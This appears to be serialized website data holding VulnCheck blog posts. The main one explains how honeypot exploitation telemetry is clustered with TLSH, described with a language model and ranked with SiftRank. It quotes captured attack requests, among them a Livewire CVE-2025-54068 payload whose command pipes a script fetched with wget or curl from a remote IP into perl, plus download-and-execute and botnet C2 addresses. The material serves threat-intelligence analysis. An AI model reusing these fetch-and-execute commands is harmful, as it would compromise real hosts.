They target the same endpoint and use the same JSON structure, but differ in the specific values supplied during exploitation:",[1354,11700,11703],{"className":11701,"code":11702,"language":1359},[1357],"POST \u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: python-cli\nContent-Type: application\u002Fjson\n\n{\"hubAddress\": \"http:\u002F\u002F138.4.32.1:8082\", \"oneTimePassword\": \"pwn\", \"nodeName\": \"victim-1771971513\"}\n",[886,11704,11702],{"__ignoreMap":219},[1354,11706,11709],{"className":11707,"code":11708,"language":1359},[1357],"POST \u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: python-cli\nContent-Type: application\u002Fjson\n\n{\"hubAddress\": \"http:\u002F\u002F138.4.32.1:8082\", \"oneTimePassword\": \"test\", \"nodeName\": \"tests\"}\n",[886,11710,11708],{"__ignoreMap":219},[18,11712,11713],{},"An exact hash treats these as unrelated strings. Under a similarity threshold of 75, TLSH produces a distance of 43 between these two payloads and places them into the same cluster. From a prioritization perspective, ranking both independently adds cost without adding insight. 
They represent the same underlying exploitation pattern.",[18,11715,11716],{},"For each decoded payload, a TLSH hash is generated when sufficient data is available:",[1354,11718,11722],{"className":11719,"code":11720,"language":11721,"meta":219,"style":219},"language-python shiki shiki-themes material-theme-lighter github-light github-dark monokai","if len(payload) > 50:\n    try:\n        tlsh_hash = tlsh.hash(payload.encode())\n    except:\n        pass\n","python",[886,11723,11724,11748,11755,11782,11789],{"__ignoreMap":219},[1373,11725,11726,11728,11731,11733,11737,11739,11742,11745],{"class":1375,"line":1376},[1373,11727,4637],{"class":4636},[1373,11729,11730],{"class":1379}," len",[1373,11732,1384],{"class":1383},[1373,11734,11736],{"class":11735},"sAZ-3","payload",[1373,11738,2230],{"class":1383},[1373,11740,11741],{"class":1397}," >",[1373,11743,11744],{"class":5467}," 50",[1373,11746,11747],{"class":1383},":\n",[1373,11749,11750,11753],{"class":1375,"line":220},[1373,11751,11752],{"class":4636},"    try",[1373,11754,11747],{"class":1383},[1373,11756,11757,11760,11762,11765,11767,11770,11772,11774,11776,11779],{"class":1375,"line":1266},[1373,11758,11759],{"class":4640},"        tlsh_hash ",[1373,11761,5417],{"class":1397},[1373,11763,11764],{"class":4640}," tlsh",[1373,11766,59],{"class":1383},[1373,11768,11769],{"class":11735},"hash",[1373,11771,1384],{"class":1383},[1373,11773,11736],{"class":11735},[1373,11775,59],{"class":1383},[1373,11777,11778],{"class":11735},"encode",[1373,11780,11781],{"class":1383},"())\n",[1373,11783,11784,11787],{"class":1375,"line":1852},[1373,11785,11786],{"class":4636},"    except",[1373,11788,11747],{"class":1383},[1373,11790,11791],{"class":1375,"line":4692},[1373,11792,11793],{"class":4636},"        pass\n",[18,11795,11796],{},"Payloads were then grouped by similarity threshold:",[1354,11798,11800],{"className":11719,"code":11799,"language":11721,"meta":219,"style":219},"dist = tlsh.diff(tl, members[0][\"_tlsh\"])\nif 
dist \u003C TLSH_THRESHOLD:\n    members.append(r)\n",[886,11801,11802,11843,11858],{"__ignoreMap":219},[1373,11803,11804,11807,11809,11811,11813,11816,11818,11821,11823,11826,11828,11830,11833,11835,11838,11840],{"class":1375,"line":1376},[1373,11805,11806],{"class":4640},"dist ",[1373,11808,5417],{"class":1397},[1373,11810,11764],{"class":4640},[1373,11812,59],{"class":1383},[1373,11814,11815],{"class":11735},"diff",[1373,11817,1384],{"class":1383},[1373,11819,11820],{"class":11735},"tl",[1373,11822,5437],{"class":1383},[1373,11824,11825],{"class":11735}," members",[1373,11827,7035],{"class":1383},[1373,11829,445],{"class":5467},[1373,11831,11832],{"class":1383},"][",[1373,11834,183],{"class":1387},[1373,11836,11837],{"class":1391},"_tlsh",[1373,11839,183],{"class":1387},[1373,11841,11842],{"class":1383},"])\n",[1373,11844,11845,11847,11850,11853,11856],{"class":1375,"line":220},[1373,11846,4637],{"class":4636},[1373,11848,11849],{"class":4640}," dist ",[1373,11851,11852],{"class":1397},"\u003C",[1373,11854,11855],{"class":2326}," TLSH_THRESHOLD",[1373,11857,11747],{"class":1383},[1373,11859,11860,11863,11865,11868,11870,11873],{"class":1375,"line":1266},[1373,11861,11862],{"class":4640},"    members",[1373,11864,59],{"class":1383},[1373,11866,11867],{"class":11735},"append",[1373,11869,1384],{"class":1383},[1373,11871,11872],{"class":11735},"r",[1373,11874,11875],{"class":1383},")\n",[18,11877,11878],{},"After clustering, the dataset is reduced from approximately 70,000 raw entries to roughly 1,400 representative clusters suitable for ranking. Ranking becomes computationally tractable and no longer dominated by repeated exploit templates.",[993,11880,11882],{"id":11881},"normalizing-exploitation-into-language","Normalizing Exploitation into Language",[18,11884,11885],{},"With structural duplication addressed, the next challenge is translating exploit traffic into something SiftRank can understand. Raw exploitation payloads are anything but. 
They are transport artifacts composed of HTTP headers, JSON bodies, encoded commands, and infrastructure references, all structured for client-server communication.",[18,11887,11888],{},"To make the payloads usable for ranking, they must be translated into concise descriptions. Before doing so, structured features are extracted from each clustered record to anchor the description in observable behavior rather than raw syntax.",[18,11890,11891],{},"From each Canary entry, the preprocessing stage attempts to extract:",[22,11893,11894,11897,11900,11903,11906],{},[25,11895,11896],{},"Referenced CVE identifiers",[25,11898,11899],{},"HTTP method and content type",[25,11901,11902],{},"Indicators of command execution such as curl, wget, gsocket, echo, base64, or PowerShell",[25,11904,11905],{},"Extracted C2 IP address and port",[25,11907,11908],{},"Observed frequency of the attacker source",[18,11910,11911],{},"These features provide context that raw request text alone does not reliably convey. Rather than asking a language model to interpret unstructured payload data, the model receives both the payload and a distilled set of behavioral signals.",[18,11913,11914],{},"Each clustered record is then sent to OpenAI using a constrained prompt that requests a concise description of:",[22,11916,11917,11920,11923,11926],{},[25,11918,11919],{},"The apparent vulnerability being targeted",[25,11921,11922],{},"The exploitation technique",[25,11924,11925],{},"Any post-exploitation behavior",[25,11927,11928],{},"Referenced infrastructure",[18,11930,11931],{},"The goal is not to generate prose. 
It is to produce short, comparable descriptions that capture intent.",[18,11933,11934],{},"For example, the following description was generated from a clustered record within the 10-day Canary backup:",[1925,11936,11937],{},[18,11938,11939,11940,11943,11944,11947],{},"The observed exploit attempt targeting CVE-2023-26801 utilizes an HTTP POST request to the endpoint ",[886,11941,11942],{},"\u002Fgoform\u002Fset_LimitClient_cfg",", injecting parameters that include a command to download and execute a malicious script from an external server. The payload retrieves a file from ",[886,11945,11946],{},"http:\u002F\u002Fbasic1997.duckdns.org:8443\u002Fo",", changes its permissions to 777, executes it, and subsequently deletes it along with any related files. This activity was exclusively sourced from Germany and directed towards the United States, with a total of 9 occurrences out of 10,703 requests, indicating a rare but focused exploitation effort leveraging the identified external infrastructure.",[18,11949,11950],{},"These normalized descriptions become the input to SiftRank.",[61,11952,11954],{"id":11953},"ranking-normalized-exploitation-with-siftrank","Ranking Normalized Exploitation with SiftRank",[18,11956,11957],{},"With approximately 1,400 clustered records translated into descriptions, the dataset is ready for ranking.",[18,11959,11960],{},"SiftRank is applied across the full set of generated descriptions using a prompt designed to prioritize investigative value rather than raw frequency. 
The goal is comparative scoring, not classification.",[18,11962,11963],{},"The ranking prompt explicitly defines what “interesting” means:",[1354,11965,11968],{"className":11966,"code":11967,"language":1359},[1357],"You are a senior threat intelligence analyst prioritizing activity for investigation.\n\nRank the following items according to investigative value and actionable intelligence.\n\nPrioritize items that:\n- Use external C2 infrastructure that appears novel or not widely commoditized\n- Download or execute secondary payloads\n- Show infrastructure reuse suggesting an active campaign\n- Demonstrate operator-controlled tradecraft\n- Provide infrastructure suitable for pivoting or attribution\n\nDeprioritize items that:\n- Represent legacy or widely commoditized botnet malware\n- Reflect repetitive mass scanning or exploit spray behavior\n- Use long-standing recycled infrastructure\n- Appear to be background internet noise\n\nDo not rank purely by prevalence. Favor novelty, leverage, infrastructure value, and investigative opportunity\n",[886,11969,11967],{"__ignoreMap":219},[18,11971,11972],{},"SiftRank is then invoked directly against the generated descriptions:",[1354,11974,11977],{"className":11975,"code":11976,"language":1359},[1357],"\u002Fgo\u002Fbin\u002Fsiftrank -f .\u002Fcanary-sentences -o sift-out.json -p @prompt\n",[886,11978,11976],{"__ignoreMap":219},[18,11980,11981],{},"On a 10-day Canary export reduced to approximately 1,400 clustered records, the ranking process completed in roughly eight minutes.",[61,11983,11985],{"id":11984},"what-rose-to-the-top","What Rose to the Top",[18,11987,11988],{},"Among the highest ranked entries were several unique XWiki and React2Shell exploitations. Just below those, at number four, was a Livewire exploitation cluster. 
The normalized description for that activity reads:",[1925,11990,11991],{},[18,11992,11993,11994,11997,11998,12001,12002,982,12004,12006],{},"The exploit targeting CVE-2025-54068 leverages a crafted HTTP POST request to the ",[886,11995,11996],{},"\u002Flivewire\u002Fupdate"," endpoint, injecting a serialized PHP object that facilitates remote code execution (RCE) through untrusted data handling. The payload includes commands to retrieve and execute a secondary payload from the external IP ",[886,11999,12000],{},"61.14.210.71",", utilizing tools like ",[886,12003,1553],{},[886,12005,1557],{},". This activity has been observed in a limited capacity, with only 10 occurrences, predominantly originating from Indonesia (6) and South Korea (3), and targeting Brazil (4), India (4), and the UK (2).",[18,12008,12009,12010,12013],{},"The actual payload, which followed an initial ",[886,12011,12012],{},"GET \u002F"," request to verify that the target was running Livewire, contained a serialized PHP object chain designed to invoke system commands. Truncated for readability, the relevant portion is shown below:",[1354,12015,12018],{"className":12016,"code":12017,"language":1359},[1357],"POST \u002Flivewire\u002Fupdate HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: python-requests\u002F2.32.4\nContent-Type: application\u002Fjson\n\n...\n\"extensions\";a:1:{s:0:\"\";s:6:\"system\";}\n...\n\"wget -qO - 61.14.210.71\u002F.j\u002Fsus|perl ; curl -s 61.14.210.71\u002F.j\u002Fsus|perl\"\n...\n",[886,12019,12017],{"__ignoreMap":219},[18,12021,12022],{},"This was not a simple probe. The injected command retrieves and executes a secondary payload hosted on attacker-controlled infrastructure.",[18,12024,12025,12026,12029],{},"That payload is a fully featured Perl-based IRC bot. 
Once executed, it connects to ",[886,12027,12028],{},"178.63.42.199"," on TCP port 88, joins a predefined IRC channel, and exposes a broad command surface that includes UDP, TCP, and HTTP flooding, port scanning, SQL scanning, reverse shell functionality, and log wiping routines. In effect, the objective is to convert the vulnerable host into an actively managed botnet node.",[18,12031,12032],{},"Under the SiftRank criteria, this entry rose to the top because it combines external C2 infrastructure, a substantial secondary payload suitable for reverse engineering, and pivotable IP artifacts that enable clustering and campaign tracking. It reflects operator-directed tradecraft rather than indiscriminate exploit spray behavior.",[18,12034,12035,12036,12041],{},"This type of activity is exactly what Canary is intended to surface. In this case, ",[47,12037,12040],{"href":12038,"rel":12039},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2026-01-30#cve-2025-54068-livewire-rce-via-php-object-unmarshalling",[51],"coverage"," for the Livewire CVE itself was requested by a customer, which makes the observed exploitation especially relevant. The ranking elevated it not because it was frequent, but because it provided actionable infrastructure and clear operator intent.",[61,12043,1903],{"id":1902},[18,12045,12046],{},"At VulnCheck, we collect exploitation telemetry, vulnerability intelligence, exploit data, internet-wide scanning results, and conduct original vulnerability research, all of which can be structured and fed directly into AI-driven workflows to prioritize threats, guide analyst tasks, and focus research on what carries operational value.",[18,12048,12049],{},"The opportunity is simple: use the data. 
Let the model help you decide where to start.",[61,12051,202],{"id":201},[18,12053,10768,12054,1246,12057,10775,12060,10779,12063,1246,12068,1246,12073,59],{},[47,12055,283],{"href":281,"rel":12056},[51],[47,12058,216],{"href":1258,"rel":12059},[51],[47,12061,1251],{"href":1249,"rel":12062},[51],[47,12064,12066],{"href":10782,"rel":12065},[51],[1131,12067,10786],{},[47,12069,12071],{"href":10789,"rel":12070},[51],[1131,12072,10793],{},[47,12074,10798,12076],{"href":10796,"rel":12075},[51],[1131,12077,10801],{},[18,12079,1228,12080,1234,12083,1240,12086,1246,12089,1246,12092,1255,12095,1260],{},[47,12081,1233],{"href":10806,"rel":12082},[51],[47,12084,1239],{"href":1237,"rel":12085},[51],[47,12087,1245],{"href":1243,"rel":12088},[51],[47,12090,1251],{"href":1249,"rel":12091},[51],[47,12093,283],{"href":281,"rel":12094},[51],[47,12096,216],{"href":1258,"rel":12097},[51],[2901,12099,12100],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki 
.siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":12102},[12103,12104,12108,12109,12110,12111],{"id":11647,"depth":220,"text":11648},{"id":11675,"depth":220,"text":11676,"children":12105},[12106,12107],{"id":11691,"depth":1266,"text":11692},{"id":11881,"depth":1266,"text":11882},{"id":11953,"depth":220,"text":11954},{"id":11984,"depth":220,"text":11985},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2026-03-02","Canary Intelligence captures thousands of real-world exploitation attempts every day, but scale alone does not create insight. This post walks through how clustering, structured feature extraction, and SiftRank transform raw exploitation telemetry into AI-driven prioritization. 
The result is a repeatable workflow that surfaces high-leverage attacker activity in minutes.",{"slug":12115},"siftrank_canaries","\u002Fblog\u002Fsiftrank_canaries",{"title":11640,"description":12113},"blog\u002Fsiftrank_canaries",[243,242,2941,1281,1279],"GMZQghYRl8nHUdqju_DzBAQZKq1yDUF25yNIlXIvI4Y",{"id":12122,"title":12123,"articles":12124,"authors":12202,"body":12205,"date":12128,"description":12333,"extension":234,"image":7,"link":7,"meta":12334,"navigation":237,"path":12335,"seo":12336,"series":7,"stem":12337,"subtype":7,"tags":12338,"__hash__":12339},"blog\u002Fblog\u002F2026-vulncheck-exploit-intelligence-report.md","Introducing the 2026 VulnCheck Exploit Intelligence Report",[12125,12129,12132,12136,12140,12143,12147,12151,12155,12160,12164,12168,12173,12177,12180,12185,12189,12194,12198],{"title":12126,"source":11228,"link":12127,"date":12128},"Vulnerabilities grew like weeds in 2025, but only 1% were weaponized in attacks","https:\u002F\u002Fcyberscoop.com\u002Fvulncheck-exploited-vulnerabilities-report-2025\u002F","2026-02-25",{"title":12130,"source":10841,"link":12131,"date":12128},"Software vulnerabilities are being weaponized faster than ever","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fsoftware-vulnerabilities-are-being-weaponized-faster-than-ever\u002F813096\u002F",{"title":12133,"source":12134,"link":12135,"date":12128},"Only one percent of vulnerabilities were actually exploited last year","BetaNews","https:\u002F\u002Fbetanews.com\u002Farticle\u002Fonly-one-percent-of-vulnerabilities-were-actually-exploited-last-year\u002F",{"title":12130,"source":12137,"link":12138,"date":12139},"CIO 
Dive","https:\u002F\u002Fwww.ciodive.com\u002Fnews\u002Fsoftware-vulnerabilities-are-being-weaponized-faster-than-ever\u002F813142\u002F","2026-02-26",{"title":12130,"source":12141,"link":12142,"date":12139},"Yahoo!News","https:\u002F\u002Fwww.yahoo.com\u002Fnews\u002Farticles\u002Fsoftware-vulnerabilities-being-weaponized-faster-112650248.html?guccounter=2",{"title":12144,"source":12145,"link":12146,"date":12139},"Report Finds Just 1% of Security Flaws Drive Most Cyberattacks in 2025","HackRead","https:\u002F\u002Fhackread.com\u002F1-security-flaws-drive-cyberattacks-2025-report\u002F",{"title":12148,"source":12149,"link":12150,"date":12139},"VulnCheck finds ransomware operators increasingly relying on zero-days, raising risk in OT environments","Industrial Cyber","https:\u002F\u002Findustrialcyber.co\u002Fransomware\u002Fvulncheck-finds-ransomware-operators-increasingly-relying-on-zero-days-raising-risk-in-ot-environments\u002F",{"title":12152,"source":12153,"link":12154,"date":12139},"Expert: Vulnerability prioritization is a persistent problem","SC Magazine","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fexpert-vulnerability-prioritization-is-a-persistent-problem",{"title":12156,"source":12157,"link":12158,"date":12159},"Risky Bulletin: Russian man investigated for extorting Conti ransomware group","RiskyBiz","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-russian-man-investigated-for-extorting-conti-ransomware-group\u002F","2026-02-27",{"title":12161,"source":12162,"link":12163,"date":12159},"News brief: Attackers gain speed in cybersecurity race","TechTarget","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366639638\u002FNews-brief-Attackers-gain-speed-in-cybersecurity-race",{"title":12165,"source":12166,"link":12167,"date":12112},"Report separates real-world exploitation trends from theoretical vulnerabilities","Homeland Preparedness 
News","https:\u002F\u002Fhomelandprepnews.com\u002Fstories\u002F83993-report-separates-real-world-exploitation-trends-from-theoretical-vulnerabilities\u002F",{"title":12169,"source":12170,"link":12171,"date":12172},"Security Now 1067 | KongTuke's CrashFix | Episode 1067","This Week In Tech (TWIT) Security Now Podcast","https:\u002F\u002Ftwit.tv\u002Fshows\u002Fsecurity-now\u002Fepisodes\u002F1067","2026-03-03",{"title":12174,"source":3508,"link":12175,"date":12176},"The Zero Day Clock Is Ticking: Why the Collapse of Exploitation Timelines Changes Everything","https:\u002F\u002Fwww.resilientcyber.io\u002Fp\u002Fthe-zero-day-clock-is-ticking-why","2026-03-05",{"title":12178,"source":11218,"link":12179,"date":12176},"Cisco Drops 48 New Firewall Vulnerabilities, 2 Critical","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fcisco-48-firewall-vulnerabilities-2-critical",{"title":12181,"source":12182,"link":12183,"date":12184},"Zero-day exploits hit enterprises faster and harder","CSO Online","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4141519\u002Fzero-day-exploits-hit-enterprises-faster-and-harder.html","2026-03-06",{"title":12186,"source":12187,"link":12188,"date":12184},"Reevaluating vulnerability managemen","The Defenders Initiative","https:\u002F\u002Fwww.defendersinitiative.com\u002Fp\u002Freevaluating-vulnerability-management",{"title":12190,"source":12191,"link":12192,"date":12193},"The Wild, Wild World of Exploits With Caitlin Condon","Decipher","https:\u002F\u002Fdecipher.sc\u002Fvideos\u002Fthe-wild-wild-world-of-exploits-with-caitlin-condon\u002F","2026-03-10",{"title":12195,"source":12196,"link":12197,"date":4172},"Security pros see Anthropic’s AI assistance as boost for bug fixers—mostly","IT Brew","https:\u002F\u002Fwww.itbrew.com\u002Fstories\u002F2026\u002F04\u002F09\u002Fsecurity-pros-see-anthropic-s-ai-assistance-as-boost-for-bug-fixers-mostly",{"title":12199,"source":12200,"link":12201,"date":3483},"NIST narrows scope 
of CVE analysis to keep up with rising tide of vulnerabilities","Cyber Scoop","https:\u002F\u002Fcyberscoop.com\u002Fnist-narrows-cve-analysis-nvd\u002F",[12203],{"name":256,"link":258,"avatar":257,"linkName":12204},"LinkedIn",{"type":15,"value":12206,"toc":12329},[12207,12210,12213,12219,12225,12231,12234,12282,12286,12295,12301,12307,12309,12312],[18,12208,12209],{},"Global organizations still struggle with basic ground truth on vulnerabilities and risk. Vulnerability and exploit information, on the whole, is still unstructured, fragmented, and opaque, with most threat notifications trailing real-world risk by days, weeks, or longer in spite of increased spending on early warning systems and “enterprise-grade” tooling. In other words, the threat ceiling has risen noticeably for defensive practitioners and front-line operators, but the industry baseline for reliable, high-quality data has arguably not only not risen — it’s falling.",[18,12211,12212],{},"At VulnCheck, we believe that data quality and consumability are solvable problems, and that timely exploit intelligence should be accessible to everyone.",[18,12214,12215],{},[68,12216],{"alt":12217,"src":12218},"2026 Exploit Intelligence Report","\u002Fveir\u002Fbanner.png",[18,12220,12221,12222,12224],{},"Today, we are proud to announce the release of a new annual research report: The ",[295,12223,1212],{}," draws on 500+ data sources to build an evidence-based picture of vulnerability and exploit trends from the past year, incorporating first-party analysis from our research teams in addition to broad coverage of open-source and other security intelligence.",[10872,12226],{"className":12227,"label":12229,"to":12230,"variant":10883,":external":10874,"target":10881},[10876,10877,12228,10879],"w-42","Download the report","https:\u002F\u002Fwwv.vulncheck.com\u002F2026-vulncheck-exploit-intelligence-report",[18,12232,12233],{},"Key report findings 
include:",[22,12235,12236,12247,12261,12268,12279],{},[25,12237,12238,12239,12242,12243,12246],{},"VulnCheck tracked ",[295,12240,12241],{},"14,000+ exploits"," developed for 10,000+ unique “CVE-2025” vulnerabilities, a ",[295,12244,12245],{},"16.5% YoY increase"," in same-year CVE exploit coverage. This rise has been driven in part by an uptick in AI-generated PoC code, much of which is non-functional or outright fake. Despite the prevalence of public PoCs, a mere 1% of 2025 CVEs were exploited in the wild by the end of the year.",[25,12248,12249,12252,12253,12256,12257,12260],{},[295,12250,12251],{},"884 vulnerabilities"," were added to VulnCheck’s industry-leading Known Exploited Vulnerabilities (KEV) dataset in 2025. ",[295,12254,12255],{},"47.7%"," of VulnCheck KEVs in 2025 were ",[295,12258,12259],{},"CVEs with 2025 identifiers",", underscoring the speed with which adversaries weaponize and deploy exploits for recent vulnerabilities.",[25,12262,12263,12264,12267],{},"There was a small decrease (-13%) in new vulnerabilities linked to ",[295,12265,12266],{},"named state-sponsored threat groups"," and APTs over the course of 2025. 
New CVE exploits attributed to China-nexus groups increased while Iranian exploit activity fell.",[25,12269,12270,12271,12274,12275,12278],{},"Only a small number of new vulnerabilities were leveraged in known ransomware incidents in 2025, but ",[295,12272,12273],{},"56.4%"," of 2025 ransomware CVEs were discovered as a result of ",[295,12276,12277],{},"zero-day exploitation",", and a third of known 2025 ransomware CVEs still had no public or commercial exploits available as of January 2026.",[25,12280,12281],{},"Deep dives on individual threat actor techniques and CVE exploits: Read in-depth analysis of Earth Lamia (China), RomCom (Russia), Cl0p, DragonForce Ransomware Cartel, and the RondoDox botnet.",[61,12283,12285],{"id":12284},"_2025-routinely-targeted-vulnerabilities","2025 Routinely Targeted Vulnerabilities",[18,12287,12288,12289,982,12292,12294],{},"We’re also pleased to announce the first annual list of VulnCheck Routinely Targeted Vulnerabilities. Our team identified 50 CVEs ",[295,12290,12291],{},"disclosed",[295,12293,970],{}," in 2025 that have elevated, multi-dimensional threat profiles. We’re releasing that list of Routinely Targeted Vulnerabilities and associated metadata to the community along with this report so readers can explore the data themselves.",[10872,12296],{"className":12297,"label":12299,"to":12300,"variant":10883},[10876,10877,12298,10879],"w-32","See the full list","\u002F2025-routinely-targeted-vulnerabilities",[18,12302,12303],{},[68,12304],{"alt":12305,"src":12306},"Top 10 CVEs 2025","\u002Fveir\u002Ftop-10-cves-2025.png",[61,12308,202],{"id":201},[18,12310,12311],{},"VulnCheck closes the exploitation-timing gap by enabling security teams to operate on attacker timelines instead of disclosure timelines. 
By delivering machine-consumable, evidence-driven intelligence on when vulnerabilities become exploitable and how attackers actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on scores or delayed consensus.",[18,12313,1228,12314,1234,12317,1240,12320,1246,12323,1255,12326,1260],{},[47,12315,1233],{"href":12316},"\u002Fkev",[47,12318,1239],{"href":1237,"rel":12319},[51],[47,12321,1245],{"href":1243,"rel":12322},[51],[47,12324,1251],{"href":1249,"rel":12325},[51],[47,12327,216],{"href":1258,"rel":12328},[51],{"title":219,"searchDepth":220,"depth":220,"links":12330},[12331,12332],{"id":12284,"depth":220,"text":12285},{"id":201,"depth":220,"text":202},"In-depth analysis of 2025 CVEs and exploit trends from VulnCheck’s research team. The 2026 Exploit Intelligence Report includes an evaluation of the public exploit ecosystem, ransomware and state-sponsored threat actor deep dives, and a data-driven list of 2025’s routinely targeted vulnerabilities.",{},"\u002Fblog\u002F2026-vulncheck-exploit-intelligence-report",{"title":12123,"description":12333},"blog\u002F2026-vulncheck-exploit-intelligence-report",[242,1281,1279,1280],"I9Sr6hm7PM0nnJ1IBqzVmFh5pyGHPTxXdZA22tg-ZGA",{"id":12341,"title":12342,"articles":7,"authors":12343,"body":12349,"date":13170,"description":13171,"extension":234,"image":7,"link":7,"meta":13172,"navigation":237,"path":13173,"seo":13174,"series":7,"stem":13175,"subtype":7,"tags":13176,"__hash__":13177},"blog\u002Fblog\u002Feconomic-value-lead-time.md","What 28 Days of Faster Vulnerability Intelligence Is Worth",[12344],{"name":12345,"avatar":12346,"link":12347,"linkName":12348},"Tanner 
Embry","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U098F45C9LN-0f0aecbaf7a6-72","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Ftannerembry\u002F","in\u002Ftannerembry\u002F",{"type":15,"value":12350,"toc":13145},[12351,12353,12379,12381,12384,12387,12391,12394,12402,12405,12411,12414,12418,12489,12495,12501,12508,12514,12520,12524,12527,12553,12556,12560,12567,12570,12574,12616,12621,12625,12676,12680,12725,12730,12733,12737,12788,12794,12799,12803,12814,12817,12820,12846,12849,12852,12884,12895,12899,12902,12908,12915,12918,12922,12925,12929,12932,12937,12941,12952,12957,12960,12964,12978,12983,12987,12990,13003,13015,13022,13032,13038,13045,13049,13052,13078,13082,13087,13090,13096,13099,13103,13114,13117,13120],[61,12352,20],{"id":3520},[22,12354,12355,12362,12369,12376],{},[25,12356,12357,12358,12361],{},"VulnCheck identifies exploited vulnerabilities ",[295,12359,12360],{},"28.13 days faster"," than CISA KEV on average",[25,12363,12364,12365,12368],{},"Of 376 CVEs in both catalogs during 2024-2025, ",[295,12366,12367],{},"VulnCheck had meaningful lead time in 67.6% of cases",", with an average lead of 41.64 days when ahead",[25,12370,12371,12372,12375],{},"Using IBM's 2025 Cost of a Data Breach data, that speed advantage translates to ",[295,12373,12374],{},"$518,000 in risk avoided per incident"," when organizations can act on it",[25,12377,12378],{},"A major financial institution validated this independently. Their internal analysis found VulnCheck was 6.3 days faster than their existing tools, worth $145,000 per incident in their environment",[1308,12380],{},[18,12382,12383],{},"When we talk about vulnerability intelligence, speed matters. But how much is faster awareness actually worth, and what does it take to turn that awareness into action?",[18,12385,12386],{},"We set out to answer those questions by combining two datasets: our own analysis of VulnCheck KEV versus CISA KEV timing, and IBM's 2025 Cost of a Data Breach Report. 
The result is a framework for quantifying the economic value of faster vulnerability intelligence.",[61,12388,12390],{"id":12389},"vulncheck-kev-vs-cisa-kev-the-data","VulnCheck KEV vs. CISA KEV: The Data",[18,12392,12393],{},"We analyzed every CVE that appeared in both the VulnCheck KEV and CISA KEV catalogs where VulnCheck's addition date fell within 2024 or 2025. The methodology was straightforward:",[18,12395,12396,10515,12399],{},[295,12397,12398],{},"Metric:",[886,12400,12401],{},"difference_days = cisa_date_added - vulncheck_date_added",[18,12403,12404],{},"A positive number means VulnCheck had the CVE first.",[18,12406,12407],{},[68,12408],{":width":10862,"alt":12409,"src":12410},"VulnCheck vs CISA KEV Breakdown","\u002Fblog\u002Feconomic-value-lead-time\u002Fvulncheck-cisa-breakdown.png",[18,12412,12413],{},"In two-thirds of cases, VulnCheck had the CVE cataloged as known exploited before CISA added it, often by weeks or months.",[993,12415,12417],{"id":12416},"lead-time-statistics","Lead Time Statistics",[307,12419,12420,12433],{},[310,12421,12422],{},[313,12423,12424,12427,12430],{},[316,12425,12426],{},"Stat",[316,12428,12429],{},"All 376 CVEs",[316,12431,12432],{},"Only when VulnCheck was first (n=254)",[336,12434,12435,12446,12457,12468,12478],{},[313,12436,12437,12440,12443],{},[341,12438,12439],{},"Mean",[341,12441,12442],{},"28.13 days",[341,12444,12445],{},"41.64 days",[313,12447,12448,12451,12454],{},[341,12449,12450],{},"Median",[341,12452,12453],{},"3 days",[341,12455,12456],{},"7 days",[313,12458,12459,12462,12465],{},[341,12460,12461],{},"Min",[341,12463,12464],{},"0 days",[341,12466,12467],{},"1 day",[313,12469,12470,12473,12476],{},[341,12471,12472],{},"Max",[341,12474,12475],{},"567 days",[341,12477,12475],{},[313,12479,12480,12483,12486],{},[341,12481,12482],{},"Std Dev",[341,12484,12485],{},"71.63 days",[341,12487,12488],{},"83.90 days",[18,12490,12491,12492,12494],{},"The mean of 28.13 days across all CVEs is the headline number. 
